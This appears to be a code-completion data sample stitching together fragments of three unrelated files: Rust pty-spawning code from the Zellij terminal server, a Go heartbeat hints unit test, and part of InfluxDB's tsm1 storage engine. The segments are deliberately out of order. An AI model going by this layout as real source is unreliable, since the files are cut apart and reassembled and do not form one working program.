::std::thread::sleep(::std::time::Duration::from_millis(10));
}
Err(e) => panic!("error attempting to wait: {}", e),
}
if !should_exit {
for signal in signals.pending() {
if signal == SIGINT || signal == SIGTERM {
should_exit = true;
}
}
} else if attempts > 0 {
// let's try nicely first...
attempts -= 1;
kill(Pid::from_raw(child.id() as i32), Some(Signal::SIGTERM)).unwrap();
continue;
} else {
// when I say whoa, I mean WHOA!
let _ = child.kill();
break 'handle_exit;
}
}
}
fn handle_openpty(
open_pty_res: OpenptyResult,
cmd: RunCommand,
quit_cb: Box<dyn Fn(PaneId) + Send>,
) -> (RawFd, RawFd) {
// primary side of pty and child fd
let pid_primary = open_pty_res.master;
let pid_secondary = open_pty_res.slave;
let mut child = unsafe {
let command = &mut Command::new(cmd.command);
if let Some(current_dir) = cmd.cwd {
if current_dir.exists() {
command.current_dir(current_dir);
}
}
command
.args(&cmd.args)
.pre_exec(move || -> std::io::Result<()> {
if libc::login_tty(pid_secondary) != 0 {
panic!("failed to set controlling terminal");
}
close_fds::close_open_fds(3, &[]);
Ok(())
})
.spawn()
.expect("failed to spawn")
};
let child_id = child.id();
std::thread::spawn(move || {
child.wait().unwrap();
handle_command_exit(child);
let _ = nix::unistd::close(pid_primary);
let _ = nix::unistd::close(pid_secondary);
quit_cb(PaneId::Terminal(pid_primary));
});
(pid_primary, child_id as RawFd)
}
/// Spawns a new terminal from the parent terminal with [`termios`](termios::Termios)
/// `orig_termios`.
///
fn handle_terminal(
cmd: RunCommand,
orig_termios: termios::Termios,
quit_cb: Box<dyn Fn(PaneId) + Send>,
) -> (RawFd, RawFd) {
// Create a pipe to allow the child to communicate the shell's pid to its
// parent.
match openpty(None, Some(&orig_termios)) {
Ok(open_pty_res) => handle_openpty(open_pty_res, cmd, quit_cb),
Err(e) => {
panic!("failed to start pty{:?}", e);
}
}
}
/// If a [`TerminalAction::OpenFile(file)`] is given, the text editor specified by environment variable `EDITOR`
/// (or `VISUAL`, if `EDITOR` is not set) will be started in the new terminal, with the given
/// file open.
/// If [`TerminalAction::RunCommand(RunCommand)`] is given, the command will be started
/// in the new terminal.
/// If None is given, the shell specified by environment variable `SHELL` will
/// be started in the new terminal.
///
/// # Panics
///
/// This function will panic if both the `EDITOR` and `VISUAL` environment variables are not
/// set.
pub fn spawn_terminal(
terminal_action: TerminalAction,
orig_termios: termios::Termios,
quit_cb: Box<dyn Fn(PaneId) + Send>,
) -> (RawFd, RawFd) {
let cmd = match terminal_action {
TerminalAction::OpenFile(file_to_open) => { | PathBuf::from(env::var("EDITOR").unwrap_or_else(|_| env::var("VISUAL").unwrap()));
let args = vec![file_to_open
.into_os_string()
.into_string()
.expect("Not valid Utf8 Encoding")];
RunCommand {
command,
args,
cwd: None,
}
}
TerminalAction::RunCommand(command) => command,
};
handle_terminal(cmd, orig_termios, quit_cb)
}
#[derive(Clone)]
pub struct ServerOsInputOutput {
orig_termios: Arc<Mutex<termios::Termios>>,
client_senders: Arc<Mutex<HashMap<ClientId, IpcSenderWithContext<ServerToClientMsg>>>>,
}
// async fn in traits is not supported by Rust, so dtolnay's excellent async_trait macro is being
// used. See https://smallcultfollowing.com/babysteps/blog/2019/10/26/async-fn-in-traits-are-hard/
#[async_trait]
pub trait AsyncReader: Send + Sync {
async fn read(&mut self, buf: &mut [u8]) -> Result<usize, std::io::Error>;
}
/// An `AsyncReader` that wraps a `RawFd`
struct RawFdAsyncReader {
fd: async_std::fs::File,
}
impl RawFdAsyncReader {
fn new(fd: RawFd) -> RawFdAsyncReader {
RawFdAsyncReader {
// The supplied `RawFd` is consumed by the created `RawFdAsyncReader` and closed when it is dropped.
fd: unsafe { AsyncFile::from_raw_fd(fd) },
}
}
}
#[async_trait]
impl AsyncReader for RawFdAsyncReader {
async fn read(&mut self, buf: &mut [u8]) -> Result<usize, std::io::Error> {
self.fd.read(buf).await
}
}
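// Usage sketch (illustrative, not part of the original API surface): an async
// task can drain the pty until EOF like so:
//
//     let mut reader = RawFdAsyncReader::new(fd);
//     let mut buf = [0u8; 4096];
//     while let Ok(n) = reader.read(&mut buf).await {
//         if n == 0 { break; }
//         // forward buf[..n] to whatever renders the pane
//     }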
/// The `ServerOsApi` trait represents an abstract interface to the features of an operating system that
/// Zellij server requires.
pub trait ServerOsApi: Send + Sync {
/// Sets the size of the terminal associated to file descriptor `fd`.
fn set_terminal_size_using_fd(&self, fd: RawFd, cols: u16, rows: u16);
/// Spawn a new terminal, with a terminal action. The returned tuple contains the master file
/// descriptor of the forked pseudo terminal and the process id of the command running inside
/// it, cast to a [RawFd].
fn spawn_terminal(
&self,
terminal_action: TerminalAction,
quit_cb: Box<dyn Fn(PaneId) + Send>,
) -> (RawFd, RawFd);
/// Read bytes from the standard output of the virtual terminal referred to by `fd`.
fn read_from_tty_stdout(&self, fd: RawFd, buf: &mut [u8]) -> Result<usize, nix::Error>;
/// Creates an `AsyncReader` that can be used to read from `fd` in an async context
fn async_file_reader(&self, fd: RawFd) -> Box<dyn AsyncReader>;
/// Write bytes to the standard input of the virtual terminal referred to by `fd`.
fn write_to_tty_stdin(&self, fd: RawFd, buf: &[u8]) -> Result<usize, nix::Error>;
/// Wait until all output written to the object referred to by `fd` has been transmitted.
fn tcdrain(&self, fd: RawFd) -> Result<(), nix::Error>;
/// Terminate the process with process ID `pid`. (SIGHUP; see the implementation below)
fn kill(&self, pid: Pid) -> Result<(), nix::Error>;
/// Terminate the process with process ID `pid`. (SIGKILL)
fn force_kill(&self, pid: Pid) -> Result<(), nix::Error>;
/// Returns a [`Box`] pointer to this [`ServerOsApi`] struct.
fn box_clone(&self) -> Box<dyn ServerOsApi>;
fn send_to_client(&self, client_id: ClientId, msg: ServerToClientMsg);
fn new_client(
&mut self,
client_id: ClientId,
stream: LocalSocketStream,
) -> IpcReceiverWithContext<ClientToServerMsg>;
fn remove_client(&mut self, client_id: ClientId);
fn load_palette(&self) -> Palette;
/// Returns the current working directory for a given pid
fn get_cwd(&self, pid: Pid) -> Option<PathBuf>;
}
impl ServerOsApi for ServerOsInputOutput {
fn set_terminal_size_using_fd(&self, fd: RawFd, cols: u16, rows: u16) {
if cols > 0 && rows > 0 {
set_terminal_size_using_fd(fd, cols, rows);
}
}
fn spawn_terminal(
&self,
terminal_action: TerminalAction,
quit_cb: Box<dyn Fn(PaneId) + Send>,
) -> (RawFd, RawFd) {
let orig_termios = self.orig_termios.lock().unwrap();
spawn_terminal(terminal_action, orig_termios.clone(), quit_cb)
}
fn read_from_tty_stdout(&self, fd: RawFd, buf: &mut [u8]) -> Result<usize, nix::Error> {
unistd::read(fd, buf)
}
fn async_file_reader(&self, fd: RawFd) -> Box<dyn AsyncReader> {
Box::new(RawFdAsyncReader::new(fd))
}
fn write_to_tty_stdin(&self, fd: RawFd, buf: &[u8]) -> Result<usize, nix::Error> {
unistd::write(fd, buf)
}
fn tcdrain(&self, fd: RawFd) -> Result<(), nix::Error> {
termios::tcdrain(fd)
}
fn box_clone(&self) -> Box<dyn ServerOsApi> {
Box::new((*self).clone())
}
fn kill(&self, pid: Pid) -> Result<(), nix::Error> {
let _ = kill(pid, Some(Signal::SIGHUP));
Ok(())
}
fn force_kill(&self, pid: Pid) -> Result<(), nix::Error> {
let _ = kill(pid, Some(Signal::SIGKILL));
Ok(())
}
fn send_to_client(&self, client_id: ClientId, msg: ServerToClientMsg) {
if let Some(sender) = self.client_senders.lock().unwrap().get_mut(&client_id) {
sender.send(msg);
}
}
fn new_client(
&mut self,
client_id: ClientId,
stream: LocalSocketStream,
) -> IpcReceiverWithContext<ClientToServerMsg> {
let receiver = IpcReceiverWithContext::new(stream);
let sender = receiver.get_sender();
self.client_senders
.lock()
.unwrap()
.insert(client_id, sender);
receiver
}
fn remove_client(&mut self, client_id: ClientId) {
let mut client_senders = self.client_senders.lock().unwrap();
if client_senders.contains_key(&client_id) {
client_senders.remove(&client_id);
}
}
fn load_palette(&self) -> Palette {
default_palette()
}
fn get_cwd(&self, pid: Pid) -> Option<PathBuf> {
let mut system_info = System::new();
// Refresh process information, requesting only the minimum needed.
// See https://docs.rs/sysinfo/0.22.5/sysinfo/struct.ProcessRefreshKind.html#
system_info.refresh_processes_specifics(ProcessRefreshKind::default());
if let Some(process) = system_info.process(pid.into()) {
return Some(process.cwd().to_path_buf());
}
None
}
}
impl Clone for Box<dyn ServerOsApi> {
fn clone(&self) -> Box<dyn ServerOsApi> {
self.box_clone()
}
}
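// Why `box_clone` exists: `Clone` cannot be a supertrait of an object-safe
// trait, so `Box<dyn ServerOsApi>` gets its `Clone` impl above by delegating
// to `box_clone`. Illustrative use:
//
//     let api: Box<dyn ServerOsApi> = Box::new(get_server_os_input()?);
//     let api2 = api.clone(); // dispatches through box_clone()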
pub fn get_server_os_input() -> Result<ServerOsInputOutput, nix::Error> {
let current_termios = termios::tcgetattr(0)?;
let orig_termios = Arc::new(Mutex::new(current_termios));
Ok(ServerOsInputOutput {
orig_termios,
client_senders: Arc::new(Mutex::new(HashMap::new())),
})
}
/// Process id's for forked terminals
#[derive(Debug)]
pub struct ChildId {
/// Primary process id of a forked terminal
pub primary: Pid,
/// Process id of the command running inside the forked terminal, usually a shell. The primary
/// field is its parent process id.
pub shell: Option<Pid>,
}
#[cfg(test)]
#[path = "./unit/os_input_output_tests.rs"]
mod os_input_output_tests; | if env::var("EDITOR").is_err() && env::var("VISUAL").is_err() {
panic!("Can't edit files if an editor is not defined. To fix: define the EDITOR or VISUAL environment variables with the path to your editor (e.g. /usr/bin/vim)");
}
let command = |
monitors_test.go | // Licensed to Elasticsearch B.V. under one or more contributor
// license agreements. See the NOTICE file distributed with
// this work for additional information regarding copyright
// ownership. Elasticsearch B.V. licenses this file to you under
// the Apache License, Version 2.0 (the "License"); you may
// not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
package hints
import (
"testing"
"github.com/stretchr/testify/assert"
"github.com/snappyflow/beats/v7/libbeat/common"
"github.com/snappyflow/beats/v7/libbeat/common/bus"
"github.com/snappyflow/beats/v7/libbeat/logp"
)
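// The bus events below stand in for autodiscover events; in a live cluster the
// hints come from annotations following heartbeat's hints convention, e.g.
// (shown for illustration only):
//
//	co.elastic.monitor/type: icmp
//	co.elastic.monitor/hosts: ${data.host}:9090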
func | (t *testing.T) {
tests := []struct {
message string
event bus.Event
len int
result common.MapStr
}{
{
message: "Empty event hints should return empty config",
event: bus.Event{
"host": "1.2.3.4",
"kubernetes": common.MapStr{
"container": common.MapStr{
"name": "foobar",
"id": "abc",
},
},
"docker": common.MapStr{
"container": common.MapStr{
"name": "foobar",
"id": "abc",
},
},
},
len: 0,
result: common.MapStr{},
},
{
message: "Hints without host should return nothing",
event: bus.Event{
"hints": common.MapStr{
"monitor": common.MapStr{
"type": "icmp",
},
},
},
len: 0,
result: common.MapStr{},
},
{
message: "Hints without matching port should return nothing in the hosts section",
event: bus.Event{
"host": "1.2.3.4",
"port": 9090,
"hints": common.MapStr{
"monitor": common.MapStr{
"type": "icmp",
"hosts": "${data.host}:8888",
},
},
},
len: 1,
result: common.MapStr{
"schedule": "@every 5s",
"type": "icmp",
},
},
{
message: "Hints with multiple hosts return only the matching one",
event: bus.Event{
"host": "1.2.3.4",
"port": 9090,
"hints": common.MapStr{
"monitor": common.MapStr{
"type": "icmp",
"hosts": "${data.host}:8888,${data.host}:9090",
},
},
},
len: 1,
result: common.MapStr{
"type": "icmp",
"schedule": "@every 5s",
"hosts": []interface{}{"1.2.3.4:9090"},
},
},
{
message: "Hints with multiple hosts return only the one with the template",
event: bus.Event{
"host": "1.2.3.4",
"port": 9090,
"hints": common.MapStr{
"monitor": common.MapStr{
"type": "icmp",
"hosts": "${data.host}:8888,${data.host}:${data.port}",
},
},
},
len: 1,
result: common.MapStr{
"type": "icmp",
"schedule": "@every 5s",
"hosts": []interface{}{"1.2.3.4:9090"},
},
},
{
message: "Monitor defined in monitors as a JSON string should return a config",
event: bus.Event{
"host": "1.2.3.4",
"hints": common.MapStr{
"monitor": common.MapStr{
"raw": "{\"enabled\":true,\"type\":\"icmp\",\"schedule\":\"@every 20s\",\"timeout\":\"3s\"}",
},
},
},
len: 1,
result: common.MapStr{
"type": "icmp",
"timeout": "3s",
"schedule": "@every 20s",
"enabled": true,
},
},
{
message: "Monitor with processor config must return an module having the processor defined",
event: bus.Event{
"host": "1.2.3.4",
"port": 9090,
"hints": common.MapStr{
"monitor": common.MapStr{
"type": "icmp",
"hosts": "${data.host}:9090",
"processors": common.MapStr{
"add_locale": common.MapStr{
"abbrevation": "MST",
},
},
},
},
},
len: 1,
result: common.MapStr{
"type": "icmp",
"hosts": []interface{}{"1.2.3.4:9090"},
"schedule": "@every 5s",
"processors": []interface{}{
map[string]interface{}{
"add_locale": map[string]interface{}{
"abbrevation": "MST",
},
},
},
},
},
{
message: "Hints with multiple monitors should return multiple",
event: bus.Event{
"host": "1.2.3.4",
"port": 9090,
"hints": common.MapStr{
"monitor": common.MapStr{
"1": common.MapStr{
"type": "icmp",
"hosts": "${data.host}:8888,${data.host}:9090",
},
"2": common.MapStr{
"type": "icmp",
"hosts": "${data.host}:8888,${data.host}:9090",
},
},
},
},
len: 2,
result: common.MapStr{
"type": "icmp",
"schedule": "@every 5s",
"hosts": []interface{}{"1.2.3.4:9090"},
},
},
}
for _, test := range tests {
m := heartbeatHints{
config: defaultConfig(),
logger: logp.NewLogger("hints.builder"),
}
cfgs := m.CreateConfig(test.event)
assert.Equal(t, len(cfgs), test.len, test.message)
if len(cfgs) != 0 {
config := common.MapStr{}
err := cfgs[0].Unpack(&config)
assert.Nil(t, err, test.message)
assert.Equal(t, test.result, config, test.message)
}
}
}
| TestGenerateHints |
engine.go | // Package tsm1 provides a TSDB in the Time Structured Merge tree format.
package tsm1 // import "github.com/influxdata/influxdb/v2/tsdb/engine/tsm1"
import (
"archive/tar"
"bytes"
"context"
"errors"
"fmt"
"io"
"io/ioutil"
"math"
"os"
"path/filepath"
"regexp"
"runtime"
"strconv"
"strings"
"sync"
"sync/atomic"
"time"
"github.com/influxdata/influxdb/v2/influxql/query"
"github.com/influxdata/influxdb/v2/logger"
"github.com/influxdata/influxdb/v2/models"
"github.com/influxdata/influxdb/v2/pkg/bytesutil"
"github.com/influxdata/influxdb/v2/pkg/estimator"
"github.com/influxdata/influxdb/v2/pkg/file"
"github.com/influxdata/influxdb/v2/pkg/limiter"
"github.com/influxdata/influxdb/v2/pkg/metrics"
"github.com/influxdata/influxdb/v2/pkg/radix"
intar "github.com/influxdata/influxdb/v2/pkg/tar"
"github.com/influxdata/influxdb/v2/pkg/tracing"
"github.com/influxdata/influxdb/v2/tsdb"
_ "github.com/influxdata/influxdb/v2/tsdb/index"
"github.com/influxdata/influxdb/v2/tsdb/index/inmem"
"github.com/influxdata/influxdb/v2/tsdb/index/tsi1"
"github.com/influxdata/influxql"
"go.uber.org/zap"
)
//go:generate -command tmpl go run github.com/benbjohnson/tmpl
//go:generate tmpl [email protected] iterator.gen.go.tmpl engine.gen.go.tmpl array_cursor.gen.go.tmpl array_cursor_iterator.gen.go.tmpl
// The file store generate step uses a custom modified tmpl
// to support adding templated data from the command line.
// This can probably be worked into the upstream tmpl
// but isn't at the moment.
//go:generate go run ../../../tools/tmpl -i -data=file_store.gen.go.tmpldata file_store.gen.go.tmpl=file_store.gen.go
//go:generate go run ../../../tools/tmpl -i -d isArray=y -data=file_store.gen.go.tmpldata file_store.gen.go.tmpl=file_store_array.gen.go
//go:generate tmpl [email protected] encoding.gen.go.tmpl
//go:generate tmpl [email protected] compact.gen.go.tmpl
//go:generate tmpl [email protected] reader.gen.go.tmpl
func init() {
tsdb.RegisterEngine("tsm1", NewEngine)
}
var (
// Ensure Engine implements the interface.
_ tsdb.Engine = &Engine{}
// Static objects to prevent small allocs.
timeBytes = []byte("time")
keyFieldSeparatorBytes = []byte(keyFieldSeparator)
emptyBytes = []byte{}
)
var (
tsmGroup = metrics.MustRegisterGroup("tsm1")
numberOfRefCursorsCounter = metrics.MustRegisterCounter("cursors_ref", metrics.WithGroup(tsmGroup))
numberOfAuxCursorsCounter = metrics.MustRegisterCounter("cursors_aux", metrics.WithGroup(tsmGroup))
numberOfCondCursorsCounter = metrics.MustRegisterCounter("cursors_cond", metrics.WithGroup(tsmGroup))
planningTimer = metrics.MustRegisterTimer("planning_time", metrics.WithGroup(tsmGroup))
)
// NewContextWithMetricsGroup creates a new context with a tsm1 metrics.Group for tracking
// various metrics when accessing TSM data.
func NewContextWithMetricsGroup(ctx context.Context) context.Context {
group := metrics.NewGroup(tsmGroup)
return metrics.NewContextWithGroup(ctx, group)
}
// MetricsGroupFromContext returns the tsm1 metrics.Group associated with the context
// or nil if no group has been assigned.
func MetricsGroupFromContext(ctx context.Context) *metrics.Group {
return metrics.GroupFromContext(ctx)
}
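// Usage sketch (illustrative): wrap a query context once, then read the group
// back wherever timings are recorded.
//
//	ctx := NewContextWithMetricsGroup(context.Background())
//	// ... run cursors with ctx ...
//	group := MetricsGroupFromContext(ctx)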
const (
// keyFieldSeparator separates the series key from the field name in the composite key
// that identifies a specific field in a series
keyFieldSeparator = "#!~#"
// deleteFlushThreshold is the size in bytes of a batch of series keys to delete.
deleteFlushThreshold = 50 * 1024 * 1024
)
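// For illustration: the composite key for field "usage_idle" of series
// "cpu,host=a" is "cpu,host=a#!~#usage_idle", and deleteFlushThreshold works
// out to 50 MiB.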
// Statistics gathered by the engine.
const (
statCacheCompactions = "cacheCompactions"
statCacheCompactionsActive = "cacheCompactionsActive"
statCacheCompactionError = "cacheCompactionErr"
statCacheCompactionDuration = "cacheCompactionDuration"
statTSMLevel1Compactions = "tsmLevel1Compactions"
statTSMLevel1CompactionsActive = "tsmLevel1CompactionsActive"
statTSMLevel1CompactionError = "tsmLevel1CompactionErr"
statTSMLevel1CompactionDuration = "tsmLevel1CompactionDuration"
statTSMLevel1CompactionQueue = "tsmLevel1CompactionQueue"
statTSMLevel2Compactions = "tsmLevel2Compactions"
statTSMLevel2CompactionsActive = "tsmLevel2CompactionsActive"
statTSMLevel2CompactionError = "tsmLevel2CompactionErr"
statTSMLevel2CompactionDuration = "tsmLevel2CompactionDuration"
statTSMLevel2CompactionQueue = "tsmLevel2CompactionQueue"
statTSMLevel3Compactions = "tsmLevel3Compactions"
statTSMLevel3CompactionsActive = "tsmLevel3CompactionsActive"
statTSMLevel3CompactionError = "tsmLevel3CompactionErr"
statTSMLevel3CompactionDuration = "tsmLevel3CompactionDuration"
statTSMLevel3CompactionQueue = "tsmLevel3CompactionQueue"
statTSMOptimizeCompactions = "tsmOptimizeCompactions"
statTSMOptimizeCompactionsActive = "tsmOptimizeCompactionsActive"
statTSMOptimizeCompactionError = "tsmOptimizeCompactionErr"
statTSMOptimizeCompactionDuration = "tsmOptimizeCompactionDuration"
statTSMOptimizeCompactionQueue = "tsmOptimizeCompactionQueue"
statTSMFullCompactions = "tsmFullCompactions"
statTSMFullCompactionsActive = "tsmFullCompactionsActive"
statTSMFullCompactionError = "tsmFullCompactionErr"
statTSMFullCompactionDuration = "tsmFullCompactionDuration"
statTSMFullCompactionQueue = "tsmFullCompactionQueue"
)
// Engine represents a storage engine with compressed blocks.
type Engine struct {
mu sync.RWMutex
index tsdb.Index
// The following group of fields is used to track the state of level compactions within the
// Engine. The WaitGroup is used to monitor the compaction goroutines, and the 'done' channel
// is used to signal those goroutines to shut down. Every request to disable level compactions
// will call 'Wait' on 'wg'; the first goroutine to arrive (levelWorkers == 0 while holding the
// lock) closes the done channel and re-assigns 'nil' to the variable. Re-enabling will
// decrease 'levelWorkers', and when it decreases to zero, level compactions will be started
// back up again.
wg *sync.WaitGroup // waitgroup for active level compaction goroutines
done chan struct{} // channel to signal level compactions to stop
levelWorkers int // Number of "workers" that expect compactions to be in a disabled state
snapDone chan struct{} // channel to signal snapshot compactions to stop
snapWG *sync.WaitGroup // waitgroup for running snapshot compactions
id uint64
path string
sfile *tsdb.SeriesFile
logger *zap.Logger // Logger to be used for important messages
traceLogger *zap.Logger // Logger to be used when trace-logging is on.
traceLogging bool
fieldset *tsdb.MeasurementFieldSet
WAL *WAL
Cache *Cache
Compactor *Compactor
CompactionPlan CompactionPlanner
FileStore *FileStore
MaxPointsPerBlock int
// CacheFlushMemorySizeThreshold specifies the minimum size threshold for
// the cache when the engine should write a snapshot to a TSM file
CacheFlushMemorySizeThreshold uint64
// CacheFlushWriteColdDuration specifies the length of time after which if
// no writes have been committed to the WAL, the engine will write
// a snapshot of the cache to a TSM file
CacheFlushWriteColdDuration time.Duration
// WALEnabled determines whether writes to the WAL are enabled. If this is false,
// writes will only exist in the cache and can be lost if a snapshot has not occurred.
WALEnabled bool
// Invoked when creating a backup file "as new".
formatFileName FormatFileNameFunc
// Controls whether to enabled compactions when the engine is open
enableCompactionsOnOpen bool
stats *EngineStatistics
// Limiter for concurrent compactions.
compactionLimiter limiter.Fixed
scheduler *scheduler
// provides access to the total set of series IDs
seriesIDSets tsdb.SeriesIDSets
// seriesTypeMap maps a series key to field type
seriesTypeMap *radix.Tree
// muDigest ensures only one goroutine can generate a digest at a time.
muDigest sync.RWMutex
}
// NewEngine returns a new instance of Engine.
func NewEngine(id uint64, idx tsdb.Index, path string, walPath string, sfile *tsdb.SeriesFile, opt tsdb.EngineOptions) tsdb.Engine {
var wal *WAL
if opt.WALEnabled {
wal = NewWAL(walPath)
wal.syncDelay = time.Duration(opt.Config.WALFsyncDelay)
}
fs := NewFileStore(path)
fs.openLimiter = opt.OpenLimiter
if opt.FileStoreObserver != nil {
fs.WithObserver(opt.FileStoreObserver)
}
fs.tsmMMAPWillNeed = opt.Config.TSMWillNeed
cache := NewCache(uint64(opt.Config.CacheMaxMemorySize))
c := NewCompactor()
c.Dir = path
c.FileStore = fs
c.RateLimit = opt.CompactionThroughputLimiter
var planner CompactionPlanner = NewDefaultPlanner(fs, time.Duration(opt.Config.CompactFullWriteColdDuration))
if opt.CompactionPlannerCreator != nil {
planner = opt.CompactionPlannerCreator(opt.Config).(CompactionPlanner)
planner.SetFileStore(fs)
}
logger := zap.NewNop()
stats := &EngineStatistics{}
e := &Engine{
id: id,
path: path,
index: idx,
sfile: sfile,
logger: logger,
traceLogger: logger,
traceLogging: opt.Config.TraceLoggingEnabled,
WAL: wal,
Cache: cache,
FileStore: fs,
Compactor: c,
CompactionPlan: planner,
CacheFlushMemorySizeThreshold: uint64(opt.Config.CacheSnapshotMemorySize),
CacheFlushWriteColdDuration: time.Duration(opt.Config.CacheSnapshotWriteColdDuration),
enableCompactionsOnOpen: true,
WALEnabled: opt.WALEnabled,
formatFileName: DefaultFormatFileName,
stats: stats,
compactionLimiter: opt.CompactionLimiter,
scheduler: newScheduler(stats, opt.CompactionLimiter.Capacity()),
seriesIDSets: opt.SeriesIDSets,
}
// Feature flag to enable per-series type checking, by default this is off and
// e.seriesTypeMap will be nil.
if os.Getenv("INFLUXDB_SERIES_TYPE_CHECK_ENABLED") != "" {
e.seriesTypeMap = radix.New()
}
if e.traceLogging {
fs.enableTraceLogging(true)
if e.WALEnabled {
e.WAL.enableTraceLogging(true)
}
}
return e
}
func (e *Engine) WithFormatFileNameFunc(formatFileNameFunc FormatFileNameFunc) {
e.Compactor.WithFormatFileNameFunc(formatFileNameFunc)
e.formatFileName = formatFileNameFunc
}
func (e *Engine) WithParseFileNameFunc(parseFileNameFunc ParseFileNameFunc) {
e.FileStore.WithParseFileNameFunc(parseFileNameFunc)
e.Compactor.WithParseFileNameFunc(parseFileNameFunc)
}
// Digest returns a reader for the shard's digest.
func (e *Engine) Digest() (io.ReadCloser, int64, error) {
e.muDigest.Lock()
defer e.muDigest.Unlock()
log, logEnd := logger.NewOperation(context.TODO(), e.logger, "Engine digest", "tsm1_digest")
defer logEnd()
log.Info("Starting digest", zap.String("tsm1_path", e.path))
digestPath := filepath.Join(e.path, DigestFilename)
// Get a list of tsm file paths from the FileStore.
files := e.FileStore.Files()
tsmfiles := make([]string, 0, len(files))
for _, f := range files {
tsmfiles = append(tsmfiles, f.Path())
}
// See if there's a fresh digest cached on disk.
fresh, reason := DigestFresh(e.path, tsmfiles, e.LastModified())
if fresh {
f, err := os.Open(digestPath)
if err == nil {
fi, err := f.Stat()
if err != nil {
log.Info("Digest aborted, couldn't stat digest file", logger.Shard(e.id), zap.Error(err))
return nil, 0, err
}
log.Info("Digest is fresh", logger.Shard(e.id), zap.String("path", digestPath))
// Return the cached digest.
return f, fi.Size(), nil
}
}
log.Info("Digest stale", logger.Shard(e.id), zap.String("reason", reason))
// Either no digest existed or the existing one was stale
// so generate a new digest.
// Make sure the directory exists, in case it was deleted for some reason.
if err := os.MkdirAll(e.path, 0777); err != nil {
log.Info("Digest aborted, problem creating shard directory path", zap.Error(err))
return nil, 0, err
}
// Create a tmp file to write the digest to.
tf, err := os.Create(digestPath + ".tmp")
if err != nil {
log.Info("Digest aborted, problem creating tmp digest", zap.Error(err))
return nil, 0, err
}
// Write the new digest to the tmp file.
if err := Digest(e.path, tsmfiles, tf); err != nil {
log.Info("Digest aborted, problem writing tmp digest", zap.Error(err))
tf.Close()
os.Remove(tf.Name())
return nil, 0, err
}
// Rename the temporary digest file to the actual digest file.
if err := file.RenameFile(tf.Name(), digestPath); err != nil {
log.Info("Digest aborted, problem renaming tmp digest", zap.Error(err))
return nil, 0, err
}
// Create and return a reader for the new digest file.
f, err := os.Open(digestPath)
if err != nil {
log.Info("Digest aborted, opening new digest", zap.Error(err))
return nil, 0, err
}
fi, err := f.Stat()
if err != nil {
log.Info("Digest aborted, can't stat new digest", zap.Error(err))
f.Close()
return nil, 0, err
}
log.Info("Digest written", zap.String("tsm1_digest_path", digestPath), zap.Int64("size", fi.Size()))
return f, fi.Size(), nil
}
// SetEnabled sets whether the engine is enabled.
func (e *Engine) SetEnabled(enabled bool) {
e.enableCompactionsOnOpen = enabled
e.SetCompactionsEnabled(enabled)
}
// SetCompactionsEnabled enables compactions on the engine. When disabled
// all running compactions are aborted and new compactions stop running.
func (e *Engine) SetCompactionsEnabled(enabled bool) {
if enabled {
e.enableSnapshotCompactions()
e.enableLevelCompactions(false)
} else {
e.disableSnapshotCompactions()
e.disableLevelCompactions(false)
}
}
// enableLevelCompactions will request that level compactions start back up again
//
// 'wait' signifies that a corresponding call to disableLevelCompactions(true) was made at some
// point, and the associated task that required disabled compactions is now complete
func (e *Engine) enableLevelCompactions(wait bool) {
// If we don't need to wait, see if we're already enabled
if !wait {
e.mu.RLock()
if e.done != nil {
e.mu.RUnlock()
return
}
e.mu.RUnlock()
}
e.mu.Lock()
if wait {
e.levelWorkers -= 1
}
if e.levelWorkers != 0 || e.done != nil {
// still waiting on more workers or already enabled
e.mu.Unlock()
return
}
// last one to enable, start things back up
e.Compactor.EnableCompactions()
e.done = make(chan struct{})
wg := new(sync.WaitGroup)
wg.Add(1)
e.wg = wg
e.mu.Unlock()
go func() { defer wg.Done(); e.compact(wg) }()
}
// disableLevelCompactions will stop level compactions before returning.
//
// If 'wait' is set to true, then a corresponding call to enableLevelCompactions(true) will be
// required before level compactions will start back up again.
func (e *Engine) disableLevelCompactions(wait bool) {
e.mu.Lock()
old := e.levelWorkers
if wait {
e.levelWorkers += 1
}
// Hold onto the current done channel so we can wait on it if necessary
waitCh := e.done
wg := e.wg
if old == 0 && e.done != nil {
// It's possible we have closed the done channel and released the lock and another
// goroutine has attempted to disable compactions. We're currently in the process of
// disabling them so check for this and wait until the original completes.
select {
case <-e.done:
e.mu.Unlock()
return
default:
}
// Prevent new compactions from starting
e.Compactor.DisableCompactions()
// Stop all background compaction goroutines
close(e.done)
e.mu.Unlock()
wg.Wait()
// Signal that all goroutines have exited.
e.mu.Lock()
e.done = nil
e.mu.Unlock()
return
}
e.mu.Unlock()
// Compactions were already disabled.
if waitCh == nil {
return
}
// We were not the first caller to disable compactions and they were in the process
// of being disabled. Wait for them to complete before returning.
<-waitCh
wg.Wait()
}
func (e *Engine) enableSnapshotCompactions() {
// Check if already enabled under read lock
e.mu.RLock()
if e.snapDone != nil {
e.mu.RUnlock()
return
}
e.mu.RUnlock()
// Check again under write lock
e.mu.Lock()
if e.snapDone != nil {
e.mu.Unlock()
return
}
e.Compactor.EnableSnapshots()
e.snapDone = make(chan struct{})
wg := new(sync.WaitGroup)
wg.Add(1)
e.snapWG = wg
e.mu.Unlock()
go func() { defer wg.Done(); e.compactCache() }()
}
func (e *Engine) disableSnapshotCompactions() {
e.mu.Lock()
if e.snapDone == nil {
e.mu.Unlock()
return
}
// We may be in the process of stopping snapshots. See if the channel
// was closed.
select {
case <-e.snapDone:
e.mu.Unlock()
return
default:
}
// first one here, disable and wait for completion
close(e.snapDone)
e.Compactor.DisableSnapshots()
wg := e.snapWG
e.mu.Unlock()
// Wait for the snapshot goroutine to exit.
wg.Wait()
// Signal that the goroutines have exited and everything is stopped by setting
// snapDone to nil.
e.mu.Lock()
e.snapDone = nil
e.mu.Unlock()
// If the cache is empty, free up its resources as well.
if e.Cache.Size() == 0 {
e.Cache.Free()
}
}
// ScheduleFullCompaction will force the engine to fully compact all data stored.
// This will cancel any running compactions and snapshot any data in the cache to
// TSM files. This is an expensive operation.
func (e *Engine) ScheduleFullCompaction() error {
// Snapshot any data in the cache
if err := e.WriteSnapshot(); err != nil {
return err
}
// Cancel running compactions
e.SetCompactionsEnabled(false)
// Ensure compactions are restarted
defer e.SetCompactionsEnabled(true)
// Force the planner to only create a full plan.
e.CompactionPlan.ForceFull()
return nil
}
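// (Import, further below, is the main caller: after overlaying backup files it
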